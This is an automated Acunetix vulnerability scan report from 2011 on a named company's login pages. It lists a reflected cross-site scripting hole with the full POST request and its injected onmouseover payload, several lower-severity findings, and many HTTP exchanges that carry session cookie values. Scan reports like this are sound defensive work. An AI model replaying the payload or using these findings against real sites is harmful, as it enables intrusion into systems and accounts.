Acunetix Website Audit
19 April, 2011

Detailed Scan Report
Generated by Acunetix WVS Reporter (v7.0 Build 20110406)

Scan of http://www.viglink.com:80/users/login

Scan details

Scan information
    Start time:    4/19/2011 1:46:25 PM
    Finish time:   4/19/2011 1:47:25 PM
    Scan time:     1 minutes, 1 seconds
    Profile:       Default

Server information
    Responsive:     True
    Server banner:  Unknown
    Server OS:      Unknown

Server threat level

Alerts distribution
    Total alerts:   19
    High:            1
    Medium:          2
    Low:             2
    Informational:  14

Knowledge base
    - List of file extensions
    - List of files with inputs
    - List of external hosts
    - List of email addresses

Alerts summary

Cross Site Scripting
    Affects                                          Variation
    /users/action/send-verification                  1

Insecure transition from HTTP to HTTPS in form post
    Affects                                          Variation
    /users/login                                     1
    /users/login (913e79c9199f7fe8d65119d9defbe129)  1

Session Cookie without HttpOnly flag set
    Affects                                          Variation
    /                                                1

Session Cookie without Secure flag set
    Affects                                          Variation
    /                                                1

Email address found
    Affects                                          Variation
    /users/action/                                   1
    /users/login                                     1
    /users/queued                                    1
    /users/send-verification                         1
    /users/signup                                    1

GHDB: Apache Tomcat Error message
    Affects                                          Variation
    /users/action/login                              1
    /users/action/send-verification                  1
    /users/action/signup                             1

GHDB: Possible login page
    Affects                                          Variation
    /users/login (913e79c9199f7fe8d65119d9defbe129)  1

Possible internal IP address disclosure
    Affects                                          Variation
    /users/action/                                   1
    /users/login                                     1
    /users/queued                                    1
    /users/send-verification                         1
    /users/signup                                    1

Alert details

Cross Site Scripting
    Severity:            High
    Type:                Validation
    Reported by module:  Scripting (XSS.script)
    Description:
    Impact:
    Recommendation:

    Affected items
    /users/action/send-verification

    Attack details
    URL encoded POST input email was set to " onmouseover=prompt(944494) bad="
    The input is reflected inside a text element.
    The input is reflected inside a tag element between double quotes.

        POST http://www.viglink.com:80/users/action/send-verification HTTP/1.1
        Content-Length: 76
        Content-Type: application/x-www-form-urlencoded
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD
        Host: www.viglink.com
        Connection: Keep-alive
        Accept-Encoding: gzip,deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

        commit=Send%20Email&email=%22%20onmouseover%3dprompt%28944494%29%20bad%3d%22

    Details
    Request
        POST /users/action/send-verification HTTP/1.1
        Content-Length: 76
        Content-Type: application/x-www-form-urlencoded
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD
        Host: www.viglink.com
        Connection: Keep-alive
        Accept-Encoding: gzip,deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

        commit=Send%20Email&email=%22%20onmouseover%3dprompt%28944494%29%20bad%3d%22

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:46:03 GMT
        Expires: -1
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Length: 5661
        Connection: keep-alive

Insecure transition from HTTP to HTTPS in form post
    Severity:

    Response
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Length: 5546

Session Cookie without HttpOnly flag set
    Severity:            Low
    Type:                Informational
    Reported by module:  Crawler
    Description:
    Impact:
    Recommendation:

    Affected items
    /

    Details
    Request
        GET / HTTP/1.1

    Response

Session Cookie without Secure flag set
    Severity:            Low
    Type:                Informational
    Reported by module:  Crawler
    Description:
    Impact:
    Recommendation:

    Affected items
    /

    Details
    Request
        GET / HTTP/1.1

    Response

Email address found
    Severity:            Informational
    Type:                Informational
    Reported by module:  Scripting (Invalid_Page_Text_Search.script)
    Description:
    Impact:
    Recommendation:

    Affected items
    /users/action/

    Details
    Request
        GET /users/action/yKMyGQDHXO.jsp HTTP/1.1
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD
        Host: www.viglink.com
        Connection: Keep-alive
        Accept-Encoding: gzip,deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 404 Not Found
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:54 GMT
        Expires: -1
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Length: 5060
        Connection: keep-alive

    /users/login

    Details
    Request
        GET /users/login HTTP/1.1
        Pragma: no-cache
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Pragma: no-cache
        Set-Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; Domain=.viglink.com; Expires=Fri, 16-Apr-2021 18:45:43 GMT; Path=/
        Set-Cookie: JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C; Path=/
        Vary: Accept-Encoding
        Content-Length: 5393
        Connection: keep-alive

    /users/queued

    Details
    Request
        GET /users/queued HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/action/signup
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:44 GMT
        Expires: -1
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Length: 5156
        Connection: keep-alive

    /users/send-verification

    Details
    Request
        GET /users/send-verification HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/login
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Pragma: no-cache
        Set-Cookie: JSESSIONID=72C84109BEF23B770007DB80460291AA; Path=/
        Vary: Accept-Encoding
        Content-Length: 5434
        Connection: keep-alive

    /users/signup

    Details
    Request
        GET /users/signup HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/login
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Pragma: no-cache
        Set-Cookie: JSESSIONID=4168FFF7D563098687600BB7AB7390F7; Path=/
        Vary: Accept-Encoding
        Content-Length: 5875
        Connection: keep-alive

GHDB: Apache Tomcat Error message
    Severity:            Informational
    Type:                Informational
    Reported by module:  GHDB
    Description:
    Impact:
    Recommendation:

    Affected items
    /users/action/login

    Details
    Request
        GET /users/action/login HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/login
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=171DEA4D3ABA00598E0AA414EAF7746E
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.0 403 Forbidden
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        Set-Cookie: JSESSIONID=D76D2B4D4BCF3D4EEB25570AA6F37A61; Path=/; Secure
        Content-Type: text/html;charset=utf-8
        Content-Length: 964
        Vary: Accept-Encoding
        Connection: close

    /users/action/send-verification

    Details
    Request
        GET /users/action/send-verification HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/send-verification
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=8CB2B4339D6EB320000567986AEF882D
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

    Response
        HTTP/1.1 403 Forbidden
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Type: text/html;charset=utf-8
        Date: Tue, 19 Apr 2011 18:45:44 GMT
        Expires: -1
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Length: 964
        Connection: keep-alive

    /users/action/signup

    Details
    Request
        GET /users/action/signup HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/signup
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=EB9077C39A3F1BC4C6FCB2E27842B446
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 403 Forbidden
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Type: text/html;charset=utf-8
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Pragma: no-cache
        Set-Cookie: JSESSIONID=8CB2B4339D6EB320000567986AEF882D; Path=/
        Vary: Accept-Encoding
        Content-Length: 964
        Connection: keep-alive

GHDB: Possible login page
    Severity:            Informational
    Type:                Informational
    Reported by module:  GHDB
    Description:
    Impact:
    Recommendation:

    Affected items
    /users/login (913e79c9199f7fe8d65119d9defbe129)

    Details
    Request
        GET /users/login?_ek=bn&ar=/users/action HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/action
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=EB9077C39A3F1BC4C6FCB2E27842B446
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Length: 5546
        Connection: keep-alive

Possible internal IP address disclosure
    Severity:            Informational
    Type:                Informational
    Reported by module:  Scripting (Invalid_Page_Text_Search.script)
    Description:
    Impact:
    Recommendation:

    Affected items
    /users/action/

    Details
    Request
        GET /users/action/yKMyGQDHXO.jsp HTTP/1.1
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD
        Host: www.viglink.com
        Connection: Keep-alive
        Accept-Encoding: gzip,deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 404 Not Found
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:54 GMT
        Expires: -1
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Length: 5060
        Connection: keep-alive

    /users/login

    Details
    Request
        GET /users/login HTTP/1.1
        Pragma: no-cache
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Pragma: no-cache
        Set-Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; Domain=.viglink.com; Expires=Fri, 16-Apr-2021 18:45:43 GMT; Path=/
        Set-Cookie: JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C; Path=/
        Vary: Accept-Encoding
        Content-Length: 5393
        Connection: keep-alive

    /users/queued

    Details
    Request
        GET /users/queued HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/action/signup
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=086124A0463191600BB354F21E6183FD
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:44 GMT
        Expires: -1
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Length: 5156
        Connection: keep-alive

    /users/send-verification

    Details
    Request
        GET /users/send-verification HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/login
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Pragma: no-cache
        Set-Cookie: JSESSIONID=72C84109BEF23B770007DB80460291AA; Path=/
        Vary: Accept-Encoding
        Content-Length: 5434
        Connection: keep-alive

    /users/signup

    Details
    Request
        GET /users/signup HTTP/1.1
        Pragma: no-cache
        Referer: http://www.viglink.com/users/login
        Cookie: vglnk.Agent.p=f104908e8a39a6ae390c622c790cee4e; JSESSIONID=0A76B9A6D1C020A6172FB4321913CC5C
        Host: www.viglink.com
        Connection: Keep-alive
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
        Accept: */*

    Response
        HTTP/1.1 200 OK
        Cache-Control: no-store, no-cache, must-revalidate
        Content-Language: en
        Content-Type: text/html;charset=UTF-8
        Date: Tue, 19 Apr 2011 18:45:43 GMT
        Expires: -1
        Pragma: no-cache
        Set-Cookie: JSESSIONID=4168FFF7D563098687600BB7AB7390F7; Path=/
        Vary: Accept-Encoding
        Content-Length: 5875